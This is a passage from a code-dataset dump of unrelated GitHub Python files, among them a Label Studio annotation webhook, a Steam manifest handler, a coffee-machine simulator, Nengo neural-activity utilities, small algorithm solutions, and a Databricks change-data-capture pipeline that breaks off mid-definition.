np.abs(filterSF[0:np.int(N/2)])\r\nsd.play(filterS,3*1024)\r\n\r\nplt.figure()\r\nplt.subplot(3,1,1)\r\nplt.plot(k,o)\r\n\r\nplt.subplot(3,1,2)\r\nplt.plot(k,add)\r\n\r\nplt.subplot(3,1,3)\r\nplt.plot(k,filterS)\r\n\r\nplt.figure()\r\nplt.subplot(3,1,1)\r\nplt.plot(f,xf)\r\n\r\nplt.subplot(3,1,2)\r\nplt.plot(f,addF)\r\n\r\nplt.subplot(3,1,3)\r\nplt.plot(f,filterSF)\r\n\r\n","repo_name":"zeyadtarek17/Noise-and-Noise-Cancellation","sub_path":"Milestone 2.py","file_name":"Milestone 2.py","file_ext":"py","file_size_in_byte":2738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"22848877548","text":"from flask import Flask, request\r\nimport requests\r\nimport pandas as pd\r\nimport os\r\nimport numpy as np\r\nfrom pprint import pprint\r\nimport paramiko\r\nimport shutil\r\nfrom create_data import read_images_and_labels\r\napp = Flask(__name__)\r\n\r\n# create new pandas dataframe with annotations\r\n\r\nrequest_count = 0\r\nlimit = 15\r\nimages = []\r\nclasses = []\r\n\r\n@app.route(\"/\",methods=[\"POST\", \"GET\"])\r\ndef receive_webhook():\r\n\r\n\r\n \"\"\"\r\n This function receives the webhook from Label Studio and saves the annotations to a csv file to be used for training the model \r\n and also triggers the next task if the number of annotations reaches 10.\r\n \"\"\"\r\n \r\n \r\n global request_count\r\n \r\n request_count +=1\r\n\r\n \r\n print(\"Request count: \", request_count)\r\n\r\n # get the number of annotations\r\n image_class = request.get_json()[\"annotation\"][\"result\"][0][\"value\"][\"choices\"][0]\r\n # CHANGE THE PATH IMAGES\r\n image_path = \"/home/jsultanov/.local/share/label-studio/media/upload/1/\" + request.get_json()[\"task\"][\"data\"][\"image\"].split(\"/\")[-1]\r\n images.append(image_path)\r\n classes.append(image_class)\r\n\r\n \r\n if request_count == limit:\r\n \r\n images_npy, labels_npy = read_images_and_labels(images,classes)\r\n \r\n np.save(\"train_images.npy\", images_npy)\r\n np.save(\"train_labels.npy\", labels_npy)\r\n\r\n # clear the lists for the next task\r\n images.clear()\r\n classes.clear()\r\n\r\n # copy the numpy files to the server\r\n source_file1 = \"train_images.npy\"\r\n destination_file1 = \"classification/train_images.npy\"\r\n shutil.copy(source_file1, destination_file1)\r\n\r\n source_file2 = \"train_labels.npy\"\r\n destination_file2 = \"classification/train_labels.npy\"\r\n shutil.copy(source_file2, destination_file2)\r\n # make post request to trigger the next task to remote server\r\n requests.post(\"http://127.0.0.1:5000/\", data = {'MESSAGE': 'OK'})\r\n print(\"=========Numpy files copied to remote folder=======\")\r\n request_count = 0\r\n \r\n \r\n\r\n return \"Success\"\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run(host='0.0.0.0')\r\n","repo_name":"ideateknoloji/Sannotate-Active-Learning","sub_path":"server_clsfc_middle.py","file_name":"server_clsfc_middle.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"14075243566","text":"import sys; input = sys.stdin.readline; sys.setrecursionlimit(10**6)\nif __name__ == '__main__':\n\n def dfs(x, y):\n global cnt\n\n if x < 0 or x >= m or y < 0 or y >= n:\n return 0\n\n if coordinates[x][y] == 1:\n return 0\n\n coordinates[x][y] = 1\n cnt += 1\n\n for i in range(4):\n dfs(x + dx[i], y + dy[i])\n\n return cnt\n\n\n m, n, k = map(int, input().split())\n coordinates = [[0] * n for _ in range(m)]\n\n for _ in range(k):\n x1, y1, x2, y2 = map(int, input().split())\n for i in range(y1, y2):\n for j in range(x1, x2):\n coordinates[i][j] = 1\n\n dx = [-1, 1, 0, 0]\n dy = [0, 0, -1, 1]\n cnt = 0\n result = []\n\n for i in range(m):\n for j in range(n):\n cnt = dfs(i, j)\n if cnt:\n result.append(cnt)\n cnt = 0\n\n result.sort()\n print(len(result))\n for i in result:\n print(i, end=' ')\n","repo_name":"HoonK212/boj-python","sub_path":"2583.py","file_name":"2583.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"29114697175","text":"#! /usr/bin/python3\n\nop=''' \npress 1 to view a single file\npress 2 to view multiple file\npress 3 to view operation similar to cat -n\npress 4 to view operation similar to cat -e\n'''\nprint(op)\na=int(input('Enter your choice'))\nif a==1:\n i=input('Enter file name:')\n jj=open(i,\"r\")\n a=jj.read()\n print(a)\n #i.close()\nelif a==2:\n i0=int(input(\"How many files do you want to show\"))\n i1=[]\n print(\"write name of files ,whose content you want to know\")\n for i in range(i0):\n \n i2=input()\n i1.append(i2)\n for i in i1:\n o1=open(str(i),'r')\n r1=o1.read()\n \n print(r1)\nelif a==3:\n i=input(\"Enter your file name:\") \n f=open(i,'r')\n data=f.read()\n a=data.split('\\n')\n l=1\n for i in a:\n print(str(l)+\" \"+i)\n l=l+1\nelif a==4:\n i=input(\"Enter your file name:\")\n f=open(i,'r')\n data=f.read()\n a=data.split('\\n')\n l=1\n for i in a:\n print(i+'$')\n l=l+1\n \n \n \n \n\n \n \n","repo_name":"chetangaur/Adhoc","sub_path":"problem6.py","file_name":"problem6.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"20615494295","text":"import re\n\nfrom typing import IO, Tuple\n\n\nclass ManifestFileError(Exception):\n \"\"\"Exception for errors during manifest file interaction.\"\"\"\n\n\nclass ManifestKeyError(Exception):\n \"\"\"Exception for errors during parsing manifest keys and values.\"\"\"\n\n\nclass ManifestHandler:\n \"\"\"Handler for interacting with appmanifest.acf files.\"\"\"\n\n def __init__(self, path: str) -> None:\n \"\"\"Initialize handler for given manifest file.\"\"\"\n self.file = path\n self.raw_content = self.get_raw_content()\n self.priority_key, self.update_priority = self.parse_update_priority()\n\n def get_raw_content(self) -> str:\n \"\"\"Return string of appmanifest content without processing.\"\"\"\n with self._open() as manifest:\n return manifest.read()\n\n def parse_update_priority(self) -> Tuple[re.Match, int]:\n \"\"\"Get match obj & value for manifest key AutoUpdateBehavior.\"\"\"\n search = re.search( # Example Entry: '\\t\"AutoUpdateBehavior\"\\t\\t\"0\"'\n r'\\t\"AutoUpdateBehavior\"\\t\\t\"(\\d)\"', self.raw_content\n )\n if search is None:\n raise ManifestKeyError(\"AutoUpdateBehavior\")\n return search, int(search.group(1))\n\n def write_new_update_priority(self, priority: int = 2) -> None:\n \"\"\"Write new value for AutoUpdateBehavior key to appmanifest.\"\"\"\n key_str = self.priority_key.group()\n new_content = self.raw_content.replace(\n key_str, key_str.replace(str(self.update_priority), str(priority))\n )\n with self._open(\"w\") as manifest:\n manifest.write(new_content)\n\n @property\n def game_title(self) -> str:\n \"\"\"Extract title of game from manifest contents.\"\"\"\n search = re.search(r'\\t\"name\"\\t\\t\"(.*)\"', self.raw_content)\n if search is None:\n raise ManifestKeyError(\"name\")\n return search.group(1)\n\n def _open(self, filemode=\"r\") -> IO:\n \"\"\"Open manifest file in specified mode.\"\"\"\n try:\n return open(self.file, filemode, encoding=\"utf-8\")\n except OSError as exc:\n raise ManifestFileError(\n \"cannot access manifest file\", self.file\n ) from exc\n\n\nif __name__ == '__main__':\n test_manifest = ManifestHandler(r\".test_manifests\\appmanifest_261640.acf\")\n print(\n test_manifest.game_title,\n test_manifest.priority_key,\n test_manifest.update_priority,\n sep=\"\\n\", end=\"\\n\"\n )\n","repo_name":"vlntnwbr/ssdk","sub_path":"ssdk/manifest.py","file_name":"manifest.py","file_ext":"py","file_size_in_byte":2457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"70351345775","text":"def make_coffee():\n from coffee_type import coffees\n from coffee_type import inventory\n from coffee_type import murphy\n import time\n\n # allow for spelling mistake from the user.\n latte = ['latte', 'Latte']\n espresso = ['espresso', 'expresso', 'espreso']\n cappuccino = ['cappuccino', 'capuccino', 'cappucino', 'cappuccinno']\n\n def check_inventory():\n \"\"\"Validate inventory availability before offering choices to clients\"\"\"\n name = []\n for key in coffees:\n name.append(key['name'])\n # used to print the list of names available to clients\n coffee_choices = name\n # print to validate the coffee_type works\n # checks for resource in inventory and will remove the choice that can't be done anymore\n for item in coffees:\n if inventory['water'] < item['water'] or inventory['coffee'] < item['coffee'] or inventory['milk'] < item['milk']:\n coffee_choices.remove(item['name'])\n print(f\"{item['name']} (not available)\")\n return coffee_choices\n\n choices = check_inventory()\n\n def user_choice():\n \"\"\"Return the dictionary of the coffee chosen with qty for price, water, coffee and milk.\n Also allow to turn machine off or print report of sales and inventory\"\"\"\n choice = input(f\"What would you like? {', '.join(choices)}: \")\n if choice not in choices and choice != 'report' and choice != 'off':\n print(\"your choice is not available. Please choose again\")\n make_coffee()\n else:\n if choice in latte:\n return coffees[1]\n elif choice in espresso:\n return coffees[0]\n elif choice in cappuccino:\n return coffees[2]\n elif choice == 'report' or choice == 'off':\n if choice == 'report':\n report()\n elif choice == 'off':\n print(\"coffee machine off\")\n turn_on = input(\"Type 'on' to resume machine operations: \")\n if turn_on == \"on\":\n make_coffee()\n else:\n print('\\nwrong command. You just broke the machine.\\nPlease call tech support ')\n exit(code='code 13')\n else:\n print('wrong choice, try again')\n make_coffee()\n\n def report():\n \"\"\"print the inventory (profit, water, coffee, milk) formatted\"\"\"\n for key, value in inventory.items():\n print(str(key) + ': ' + str(value))\n\n coffee_2_make = user_choice()\n accepted_coin = [.05, .10, .25]\n price = float(coffee_2_make['price'])\n total_in = 0\n paying = True\n\n while paying:\n if total_in < price:\n left_to_pay = price - total_in\n coin = float(input(f\"{format(left_to_pay, '.2f')}$, Insert a coin: .25\\xa2, .10\\xa2 or .05\\xa2.: \"))\n if coin not in accepted_coin:\n print('(money returned) Only coins accepted are: .25\\xa2, .10\\xa2 or .05\\xa2.')\n else:\n total_in = total_in + coin\n elif total_in > price:\n print(f\"{format(total_in - price, '.2f')}$ is your change. Enjoy your coffee\")\n paying = False\n inventory['profit'] += price\n inventory[\"water\"] -= coffee_2_make[\"water\"]\n inventory[\"coffee\"] -= coffee_2_make[\"coffee\"]\n inventory[\"milk\"] -= coffee_2_make[\"milk\"]\n elif total_in == price:\n import random\n lucky = random.choice(murphy)\n print('\\npercolating')\n time.sleep(2)\n print(lucky)\n print(\"Enjoy your coffee\\n\\n\")\n paying = False\n inventory['profit'] += price\n inventory[\"water\"] -= coffee_2_make[\"water\"]\n inventory[\"coffee\"] -= coffee_2_make[\"coffee\"]\n inventory[\"milk\"] -= coffee_2_make[\"milk\"]\n time.sleep(2)\n make_coffee()\n\n\nmake_coffee()\n","repo_name":"Gabbbrielle/coffee_machine","sub_path":"coffee_machine/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"28968955728","text":"\"\"\"\nvarious tools for use with Nengo such as input signal scaling and running nengo\nsimulations to return the neural profile showing different activity metrics.\n\nThe profile can consist of:\n- the proportion of active neurons over time\n- the proportion of time neurons are active\n- raster plot of the activity\n\nThese can be run individually for any nengo network, or the parameters to\ninstantiate a dynamics_adaptation network from abr_control can be passed in to\nget_learning_profile() to run all three of the above\n\nNOTE: see examples of running for a single profile, or looping through various\nintercepts to later view in the intercept_scan_viewer.py gui\n\"\"\"\n\nimport warnings\n\nimport matplotlib.pyplot as plt\nimport nengo\nimport numpy as np\nfrom abr_control._vendor.nengolib.stats import ScatteredHypersphere\nfrom nengo.utils.matplotlib import rasterplot\n\n\ndef generate_encoders(n_neurons, input_signal=None, thresh=0.008, depth=0):\n \"\"\"\n Accepts an input_signal in the shape of time X dim and outputs encoders\n for the specified number of neurons by sampling from the input.\n The selection is made by choosing inputs randomly and checking that\n they are minimally thresh away from one another to avoid overly similar\n encoders. If we have exhausted the search then we increase thresh and\n rescan, until len(encoders) == number of neurons. If there are not\n enough input signal samples to select for the number of neurons, or an\n input_signal of None is passed in, the remainder will be filled with a\n selection from a scattered hypersphere\n\n PARAMETERS\n ----------\n n_neurons : int\n the number of neurons in the simulation, needed to get\n a corresponding number of encoders\n input_signal : array(time_steps, dimensions), Optional (Default: None)\n the input signal to sample from\n thresh : float, Optional (Default: 0.008)\n the threshold to keep encoder values minimally apart from\n It may be helpful to increase this value if there are many more\n inputs than there are neurons in the final simulation to speed up\n the encoder selection process\n depth : int\n how many times has this function been recursively called\n \"\"\"\n\n # first run so we need to generate encoders for the sessions\n ii = 0\n iters_with_no_update = 0\n prev_n_indices = 0\n while input_signal.shape[0] > n_neurons:\n\n ii += 1\n if (ii % 1000) == 0:\n print(\n \"Downsampled to %i encoders at iteration %i\"\n % (input_signal.shape[0], ii),\n \"Current threshold value: %.3f\" % thresh,\n end=\"\\r\",\n )\n\n # choose a random set of indices\n n_indices = input_signal.shape[0]\n\n # make sure we're dealing with an even number\n n_indices -= int(n_indices % 2)\n n_half = int(n_indices / 2)\n\n # split data into two random groups\n randomized_indices = np.random.permutation(range(n_indices))\n a = randomized_indices[:n_half]\n b = randomized_indices[n_half:]\n data1 = input_signal[a]\n data2 = input_signal[b]\n\n # calculate the 2 norm between random pairs between data1 and 2\n distances = np.linalg.norm(data1 - data2, axis=1)\n # find any pairs within threshold distance of each other\n under_thresh = distances > thresh\n # remove the values from data2 within thresh of corresponding data1\n input_signal = np.vstack([data1, data2[under_thresh]])\n\n if prev_n_indices == n_indices:\n iters_with_no_update += 1\n else:\n iters_with_no_update = 0\n\n # if we've run 50 iterations but we're still haven't downsampled\n # enough, increase the threshold distance and keep going\n if iters_with_no_update == 50:\n iters_with_no_update = 0\n thresh += 0.1 * thresh\n prev_n_indices = n_indices\n\n if input_signal.shape[0] != n_neurons:\n print(\n \"Too many indices removed, appending samples from \" + \"ScatteredHypersphere\"\n )\n length = n_neurons - input_signal.shape[0] + 1\n hypersphere = ScatteredHypersphere(surface=True)\n hyper_inputs = hypersphere.sample(length, input_signal.shape[1])\n input_signal = np.vstack((input_signal, hyper_inputs))\n\n # make sure that the new inputs meet threshold constraints\n if depth < 10:\n input_signal = generate_encoders(\n n_neurons, input_signal, thresh=thresh, depth=depth + 1\n )\n else:\n # if we've tried several times to find input meeting\n # outside threshold distance but failed, return with warning\n # so we're not stuck in infinite loop\n warnings.warn(\"Could not find set of encoders outside thresh distance\")\n\n # clear the previous recurrent print\n print(\"\\n\")\n return np.array(input_signal)\n\n\ndef raster_plot(network, input_signal, ax, network_ens=None, n_ens_to_raster=None):\n \"\"\"\n Accepts a Nengo network and runs a simulation with the input_signal\n Plots rasterplot onto ax object up to n_ens_to_raster ensembles\n if n_ens_to_raster is None, all ensembles will be plotted\n\n PARAMETERS\n ----------\n network: .DynamicsAdaptation\n 'abr_control.controllers.signals.dynamics_adaptation'\n input_signal: np array shape of (time_steps x input_dim)\n the input used for the network sim\n ax: ax object\n used for the rasterplot\n n_ens_to_raster: int, Optional (Default: None)\n the number of ensembles to plot in the raster,\n if None all will be plotted\n \"\"\"\n if network_ens is None:\n network_ens = network.adapt_ens\n\n if n_ens_to_raster is None:\n n_ens_to_raster = len(network_ens)\n\n spike_trains = get_activities(\n network=network, network_ens=network_ens, input_signal=input_signal\n )\n\n time = np.ones(len(input_signal))\n\n ax = rasterplot(np.cumsum(time), spike_trains, ax=ax)\n\n ax.set_ylabel(\"Neuron\")\n ax.set_xlabel(\"Time [sec]\")\n ax.set_title(\"Spiking Activity\")\n\n return spike_trains\n\n\ndef get_activities(network, input_signal, network_ens=None, dt=0.001, synapse=None):\n \"\"\"\n Accepts a Nengo network and input signal and simulates it, returns the\n activities. If synapse is None, it returns the spike trains\n\n PARAMETERS\n ----------\n network: .DynamicsAdaptation\n 'abr_control.controllers.signals.dynamics_adaptation'\n input_signal: np array shape of (time_steps x input_dim)\n the input used for the network sim\n synapse: float, Optional (Default: None)\n the synapse filter on the nengo probe\n \"\"\"\n if network_ens is None:\n network_ens = network.adapt_ens\n\n # if there aren't neuron probes in the network add them\n with network.nengo_model:\n network.probe_neurons = []\n if not isinstance(network_ens, list):\n network_ens = [network_ens]\n for ens in network_ens:\n network.probe_neurons.append(nengo.Probe(ens.neurons, synapse=synapse))\n network.sim = nengo.Simulator(network.nengo_model, progress_bar=False)\n\n for mm, in_sig in enumerate(input_signal):\n print(\"Running sim %i/%i\" % (mm, len(input_signal)), end=\"\\r\")\n network.input_signal = in_sig\n network.sim.run(dt, progress_bar=False)\n\n activities = []\n for probe in network.probe_neurons:\n activities.append(network.sim.data[probe] * dt)\n activities = np.hstack(activities)\n\n return np.array(activities)\n\n\ndef proportion_neurons_active_over_time(\n input_signal=None,\n network=None,\n network_ens=None,\n pscs=None,\n synapse=0.005,\n ax=None,\n n_neurons=None,\n n_ensembles=None,\n):\n \"\"\"\n Accepts a Nengo network and simulates its response to a given input\n Plots the proportion of active neurons vs run time onto the ax object\n Returns the proportion active and the post-synaptic currents\n\n PARAMETERS\n ----------\n input_signal: np array (time_steps x input_dim)\n the input used for the network sim\n network: .DynamicsAdaptation\n 'abr_control.controllers.signals.dynamics_adaptation'\n pscs: np.array (timesteps x n_neurons), Optional (Default: None)\n the output from get_activities(synapse)\n where 0.005 is the default pre_synapse time constant in PES\n ax: ax object\n for plotting the output\n \"\"\"\n assert not (\n network is None and pscs is None\n ), \"Either a network object or an array of spike trains must be provided\"\n\n if pscs is None:\n if network_ens is None:\n network_ens = network.adapt_ens\n\n pscs = get_activities(\n network=network,\n network_ens=network_ens,\n input_signal=input_signal,\n synapse=synapse,\n )\n\n n_neurons_active = np.zeros(pscs.shape[0])\n for ii, timestep in enumerate(pscs):\n n_neurons_active[ii] = len(np.where(timestep > 1e-2)[0])\n if n_neurons is None:\n n_neurons = network.n_neurons\n if n_ensembles is None:\n n_ensembles = network.n_ensembles\n\n proportion_neurons_active = n_neurons_active / (n_neurons * n_ensembles)\n\n if ax is not None:\n print(\"Plotting proportion of active neurons over time...\")\n ax.plot(proportion_neurons_active, label=\"proportion active\")\n\n ax.set_title(\"Proportion of active neurons over time\")\n ax.set_ylabel(\"Proportion Active\")\n ax.set_xlabel(\"Time steps\")\n ax.set_ylim(0, 1)\n plt.legend()\n\n return proportion_neurons_active, pscs\n\n\ndef proportion_time_neurons_active(\n input_signal=None,\n network=None,\n network_ens=None,\n pscs=None,\n synapse=0.005,\n ax=None,\n **kwargs,\n):\n \"\"\"\n Accepts a Nengo network andsimulates its response to a given input\n Plots a histogram of neuron activity relative to run time onto ax\n Returns the time active and the post-synaptic currents\n\n PARAMETERS\n ----------\n input_signal: np array (time_steps x input_dim)\n the input used for the network sim\n network: .DynamicsAdaptation, Optional, (Default: None)\n 'abr_control.controllers.signals.dynamics_adaptation'\n pscs: np.array (timesteps x n_neurons), Optional (Default: None)\n the output from get_activities(synapse)\n where 0.005 is the default pre_synapse time constant in PES\n ax: ax object\n for plotting the output\n \"\"\"\n assert not (\n network is None and pscs is None\n ), \"Either a network object or an array of spike trains must be provided\"\n\n if pscs is None:\n if network_ens is None:\n network_ens = network.adapt_ens\n\n pscs = get_activities(\n network=network,\n network_ens=network_ens,\n input_signal=input_signal,\n synapse=synapse,\n )\n\n # for spike_train in pscs:\n n_timesteps_active = np.zeros(pscs.shape[1])\n for ii, timestep in enumerate(pscs.T):\n n_timesteps_active[ii] = len(np.where(timestep > 1e-2)[0])\n proportion_time_active = n_timesteps_active / pscs.shape[0]\n\n if ax is not None:\n plt.hist(proportion_time_active, bins=np.linspace(0, 1, 100))\n ax.set_ylabel(\"Number of active neurons\")\n ax.set_xlabel(\"Proportion of Time\")\n ax.set_title(\"Proportion of time neurons are active\")\n\n return proportion_time_active, pscs\n\n\ndef n_neurons_active_and_inactive(activity):\n \"\"\"\n Accepts a list of neural activities and returns how many neurons are\n active and never active\n\n PARAMETERS\n ----------\n activity: int list of shape (n_timesteps x n_neurons)\n a list of the neural activity over time\n \"\"\"\n activity = np.asarray(activity)\n if activity.ndim != 2:\n raise Exception(\"Input should be n_timesteps x n_neurons\")\n\n activity_sum = np.sum(activity, axis=0)\n n_inactive = len(np.where(activity_sum == 0)[0])\n n_active = activity.shape[1] - n_inactive\n return n_active, n_inactive\n\n\ndef gen_learning_profile(\n network,\n input_signal,\n network_ens=None,\n ax_list=None,\n synapse=None,\n n_ens_to_raster=None,\n show_plot=True,\n savename=None,\n n_neurons=None,\n n_ensembles=None,\n):\n \"\"\"\n Plots the networks neural activity onto three subplots, the rasterplot,\n proportion of active neurons over time, and how many neurons were active\n over different proportions of run time\n\n Accepts an abr_control dynamics_adaptation network object and input signal\n Plots\n 1. rasterplot showing spikes for each neuron over time on one axis, and the\n input signal of the other\n 2. proportion of time active, the number of neurons active vs proportion\n of run time\n 3. proportion of neurons that are active over time\n\n PARAMETERS\n ----------\n network: .DynamicsAdaptation\n 'abr_control.controllers.signals.dynamics_adaptation'\n input_signal: np array shape of (time_steps x input_dim)\n the input used for the network sim\n ax_list: list of 3 ax objects\n used for the rasterplot\n n_ens_to_raster: int, Optional (Default: None)\n the number of ensembles to plot in the raster,\n if None all will be plotted\n show_plot: boolean, Optional (Default: True)\n whether to show the figure at the end of the script or not\n savename: string, Optional (Default: None)\n string where to save figure, including figure name. If None will not save\n network_ens: list of ensembles to probe, Optional (Default: None)\n if None then function will assume the network has an ensemble list\n saved as self.adapt_ens. This allows for other definitions to be used\n \"\"\"\n\n if ax_list is None:\n plt.figure(figsize=(12, 16))\n ax_list = []\n for ii in range(0, 3):\n ax_list.append(plt.subplot(3, 1, ii + 1))\n\n print(\"Getting rasterplot...\")\n pscs = raster_plot(\n network=network,\n network_ens=network_ens,\n input_signal=input_signal,\n ax=ax_list[0],\n n_ens_to_raster=n_ens_to_raster,\n )\n\n print(\"Getting neuron activity over time...\")\n # use the input signal to generate the pscs\n proportion_active, _ = proportion_neurons_active_over_time(\n pscs=pscs,\n n_neurons=n_neurons,\n n_ensembles=n_ensembles,\n input_signal=input_signal,\n network=network,\n network_ens=network_ens,\n ax=ax_list[1],\n synapse=synapse,\n )\n\n # use the same pscs here rather than rerunning simulation\n print(\"Getting proportion of time neurons are active...\")\n proportion_time_neurons_active(\n network=network,\n network_ens=network_ens,\n pscs=pscs,\n ax=ax_list[2],\n synapse=synapse,\n )\n\n n_active, n_inactive = n_neurons_active_and_inactive(activity=pscs)\n\n print(\"Number of neurons inactive: \", n_inactive)\n print(\"Number of neurons active: \", n_active)\n ax_list[1].legend([\"Mean Prop Active: %.2f\" % np.mean(proportion_active)])\n ax_list[2].legend([\"Active: %i | Inactive: %i\" % (n_active, n_inactive)])\n\n plt.tight_layout()\n if savename is not None:\n print(f\"Saving figure to {savename}\")\n plt.savefig(savename)\n if show_plot:\n plt.show()\n\n\ndef gen_intercept_bounds_and_modes(\n intercept_range=None, intercept_step=0.1, mode_range=None, mode_step=0.2\n):\n \"\"\"\n Accepts a range of intercept bounds and modes and returns an np.array\n of the valid combinations\n\n The validity is based on the following rules:\n - left bound < right bound\n - mode >= left bound\n - mode <= right bound\n\n PARAMETERS\n ----------\n intercept_range: list of two floats, Optional (Default: [-0.9, 1])\n the range of bounds to try. *See Note at bottom*\n mode_range: list of two floats, Optional (Default: [-0.9, 1])\n the range of modes to try. *See Note at bottom*\n intercept_step: float, Optional (Default: 0.1)\n the step size for the range of values between the range specified\n mode_step: float, Optional (Default: 0.2)\n the step size for the range of values between the range specified\n\n NOTE:\n the way the range function used on these values works, the second\n value (far right of range) is ignored. For this reason, to include\n 0.9, you must have the right side of the limit set to you desired\n limit + intercept_step.\n EX: to include 0.9 as the far right limit for the intercept bounds,\n assuming the intercept step is set to 0.1, the intercept range for\n the right bound must be set to 0.9 + 0.1 = 1.0 to check the range\n of values up to and including 0.9\n \"\"\"\n if intercept_range is None:\n intercept_range = [0.0, 1]\n if mode_range is None:\n mode_range = [0.0, 1]\n intercept_range = np.arange(intercept_range[0], intercept_range[1], intercept_step)\n mode_range = np.arange(mode_range[0], mode_range[1], mode_step)\n\n # Create list of all possible intercepts\n intercepts = np.array(np.meshgrid(intercept_range, intercept_range)).T.reshape(\n -1, 2\n )\n # get a list of all valid intercepts\n valid = []\n for vals in intercepts:\n vals[0] = round(vals[0], 1)\n vals[1] = round(vals[1], 1)\n if vals[0] < vals[1]:\n for mode in mode_range:\n mode = round(mode, 1)\n if vals[0] <= mode <= vals[1]:\n valid.append(np.array([vals[0], vals[1], mode]))\n\n intercepts = np.array(valid)\n print(\"There are %i valid combinations of intercepts and modes\" % len(intercepts))\n\n return intercepts\n","repo_name":"abr/abr_analyze","sub_path":"abr_analyze/nengo/network_utils.py","file_name":"network_utils.py","file_ext":"py","file_size_in_byte":17720,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"56"} +{"seq_id":"5553511733","text":"import sys\n\nreadline, write = (sys.stdin.readline, sys.stdout.write)\nres = []\n\nt = int(readline())\nfor _ in range(t):\n n = int(readline())\n costs = list(map(int, readline().strip().split(\" \")))[:n]\n total = int(readline())\n dp = [1] + [0] * (total)\n for cost in costs:\n for i in range(cost, total + 1):\n dp[i] += dp[i - cost]\n res.append(dp[total])\nwrite(\"\\n\".join(str(i) for i in res))","repo_name":"hyeongcheolkim/ProblemSolving","sub_path":"Python/ps_baekjoon/9084/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"56"} +{"seq_id":"2555506727","text":"# Databricks notebook source\nimport dlt\nimport pyspark.sql.functions as F\nimport json\n\nstaged_data_root = spark.conf.get(\"dltPipeline.stagedDataRoot\")\n\n# COMMAND ----------\n\ndef get_tables_to_ingest():\n # Here we are using pipeline parameters to set the configuration of tables to ingest;\n # this could be pulled directly from the SQL metastore by\n # connecting to it via JBDC\n #\n # In production, it would be best to scope this pipeline\n # to a collection of tables, rather than all the tables available,\n # eg don't ingest 100 tables at once here; limit it to a logical grouping\n \n # the below expects configurtion to be of the format:\n # dltPipeline.table.[n].(table|identity_cols)\n # eg:\n #\n # dltPipeline.table.0.name my_table_1\n # dltPipeline.table.0.identity_cols id\n # dltPipeline.table.1.name my_table_2\n # dltPipeline.table.1.identity_cols name,revision\n \n # this is pretty fragile code - doesn't handle errors/bad config gracefully\n max_config_items = 1000 # failsafe for max config\n table_config = []\n for i in range(0, max_config_items):\n try:\n name = spark.conf.get(f'dltPipeline.table.{i}.name')\n identity_cols = spark.conf.get(f'dltPipeline.table.{i}.identityCols').split(',')\n except Exception:\n break\n \n table_config.append({\"name\": name, \"identity_cols\": identity_cols})\n \n return table_config\n\n# COMMAND ----------\n\ndef generate_tables(table, keys):\n # this is the function for dynamically generating tables,\n # using the table metadata as the parameters.\n # in a more traditional silver/gold tables where you define\n # the sql for the table, you wouldn't need to do this\n \n bronze_name = f'bronze_{table}'\n pretty_name = f'cdc_pretty_view_{table}'\n silver_name = f'silver_{table}'\n silver_scd_1_name = f'silver_scd_1_{table}'\n silver_scd_2_name = f'silver_scd_2_{table}'\n \n cdc_columns = [\n '__$start_lsn',\n '__$end_lsn',\n '__$seqval',\n '__$operation',\n '__$update_mask',\n '__$command_id'\n ]\n \n cdc_order_columns = ['__$start_lsn', '__$command_id', '__$seqval', '__$operation']\n\n def add_global_order(df, colname):\n return df.withColumn(colname, F.concat(*cdc_order_columns).cast('binary'))\n \n cdc_columns_pretty = [c.replace('__$', '__') for c in cdc_columns]\n \n # auto loader currently does not support schema inference from parquet\n # this will be coming soon, but for the time being the schema will need to be managed\n # the way this is done below is not a good example of what should be done in production\n # it will get slower as the size of the staging location increases\n # instead, consider infering the schema on a smaller subset of the staging data,\n # or from managing it within the ingestion metadata database\n schema = spark.read.format('parquet').load(f'{staged_data_root}/{table}/*.parquet').schema\n \n @dlt.table(\n name=bronze_name,\n comment=f'raw bronze cdc data for {table}'\n )\n def create_bronze_table():\n return spark.readStream.format('cloudfiles').schema(schema).option('cloudfiles.format', 'parquet').load(f'{staged_data_root}/{table}/*.parquet')\n \n @dlt.view(\n name=pretty_name,\n comment=f'cleaner formatted version of raw cdc table {table}'\n )\n def create_cdc_pretty_view():\n df = add_global_order(dlt.read_stream(bronze_name), '__global_order')\n return (df\n .select([\"*\"] + [F.col(cdc_col).alias(cdc_col_pretty) for cdc_col, cdc_col_pretty in zip(cdc_columns, cdc_columns_pretty)])\n .drop(*cdc_columns)\n .filter(F.col('__operation') != 3) # ignore values prior to insert - not needed\n .withColumn(\"__operation\", F.when(F.col('__operation') == 1, 'DELETE')\n .when(F.col('__operation') == 2, 'INSERT')\n .when(F.col('__operation') == 4, 'UPDATE')\n .otherwise(F.lit(None))\n )\n )\n \n @dlt.table(\n name=f'silver_{table}',\n comment=f'Cleaner formatted version of raw cdc table {table}, maintaining full history'\n )\n def create_silver_table():\n return dlt.read_stream(pretty_name)\n \n dlt.create_target_table(\n name=silver_scd_1_name,\n comment=f'SCD type 1 version of cdc table {table}'\n )\n \n dlt.apply_changes(\n target = silver_scd_1_name,\n source = pretty_name,\n keys = keys,\n sequence_by = F.col(\"__global_order\"),\n apply_as_deletes = F.col('__operation') == 'DELETE',\n except_column_list = cdc_columns_pretty\n )\n \n dlt.create_target_table(\n name=silver_scd_2_name,\n comment=f'SCD type 2 version of cdc table {table}'\n )\n \n dlt.apply_changes(\n target = silver_scd_2_name,\n source = pretty_name,\n keys = keys,\n sequence_by = F.col(\"__seqval\"), #TODO: confirm with MSFT that seqval is the only column needed for ordering\n apply_as_deletes = F.col('__operation') == 'DELETE',\n except_column_list = cdc_columns_pretty,\n stored_as_scd_type = \"2\"\n 